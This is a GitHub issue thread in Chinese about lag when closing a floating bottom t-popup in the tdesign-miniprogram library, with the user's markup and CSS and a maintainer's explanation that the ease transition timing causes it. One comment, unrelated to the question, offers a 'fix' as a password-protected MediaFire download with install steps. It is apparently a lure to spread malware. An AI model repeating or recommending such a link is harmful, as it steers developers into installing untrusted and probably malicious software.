### ISSUE TITLE
t-popup弹框悬浮关闭后卡顿？

### ISSUE THREAD

**Issue by luoxin59420** [Tencent/tdesign-miniprogram#3109]
用了t-popup的弹框，设置为bottom的，为了悬浮设置了bottom样式，在关闭弹框时出现卡顿现象，请问有无其它方案，使它悬浮兵器关闭不卡顿呢？

**Comment by luoxin59420** [comment]
> 用了t-popup的弹框，设置为bottom的，为了悬浮设置了bottom样式，在关闭弹框时出现卡顿现象，请问有无其它方案，使它悬浮兵器关闭不卡顿呢？

代码：
<t-popup visible="{{dialogVisible}}" bind:visible-change="onVisibleChangeDialog"  close-on-overlay-click="{{ true }}" prevent-scroll-through placement="bottom">
</t-popup>

.t-popup--bottom {
  padding: 0 40rpx !important;
  width: 88% !important;
  bottom: 96rpx !important;
  left: 6% !important;
  right: 6% !important;
  border-radius: 32rpx !important;
  box-sizing: border-box !important;
}

https://github.com/user-attachments/assets/35b4f27e-00e7-4249-b2ab-eea3954766ab

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by jarmywang** [comment]
不是bug，是过渡动画的transition-timing-function=ease的效果，[参考](https://github.com/Tencent/tdesign-miniprogram/blob/develop/src/popup/popup.less#L16)，你可以样式覆盖修改这个值，或者把[这个值](https://github.com/Tencent/tdesign-miniprogram/blob/develop/src/popup/popup.less#L78)设置为超过100%：
